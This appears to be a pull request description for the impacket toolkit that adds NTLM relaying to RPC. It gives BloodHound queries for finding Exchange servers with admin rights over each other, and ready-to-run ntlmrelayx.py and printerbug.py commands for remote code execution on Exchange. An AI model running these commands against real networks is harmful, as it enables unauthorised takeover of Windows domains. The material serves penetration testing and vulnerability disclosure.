Added Relaying to RPC support to impacket

Hello there,

This PR implements Relaying to RPC attack which currently allows RCE in any MS Exchange via Exchange Trusted Subsystem group (All exchange systems have Administrator rights to each other via this or similar group) and printerbug.py.

BloodHound queries to find vulnerable machines

MATCH p=(a:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(b:Computer) RETURN p
MATCH p=(a:Computer)-[r:AdminTo]->(b:Computer) RETURN p

Usage

Relaying to ncacn_ip_tcp:

# Console 1
sudo python2 ntlmrelayx.py -debug -c whoami -t rpc://EXCHANGE1-ADDR
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}

Relaying to IPC$ (low-privileged account needed), but requires only 445/tcp, and the connection will be encrypted:

# Console 1
sudo python2 ntlmrelayx.py -c whoami -t rpc://EXCHANGE1-ADDR -rpc-use-smb -auth-smb 'CONTOSO/test:P@ssw0rd'
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}

Description

My original complete patch: https://gist.github.com/mohemiv/ab542e4ff5d8fedda790e35326705bad

MD5SUM from May 2, 2020: https://twitter.com/_mohemiv/status/1256636651780087809

The supported functions:

IPC$

Also I've tested relaying connections to MMC20 object, but relaying to DCOM will gave you only the relayed user permissions, in my PoC it required 2 connections from the target, and there is no way to launch a DCOM object via only 445/tcp. So, the full PoC for DCOM has not been developed. Relaying to WMI is not possible as WMI requires signing.

As you already know, Compass Security company has already published the description of this attack ( https://twitter.com/compasssecurity/status/1260898906629529602 ), but as I know from MS, the patch is not fully developed yet. May be it because of IPC$ and MMC20 examples I sent via MSRC.

For @CompassSecurity , it will be interesting to see your RPC Server and ways to get an incoming RPC connection :sunglasses: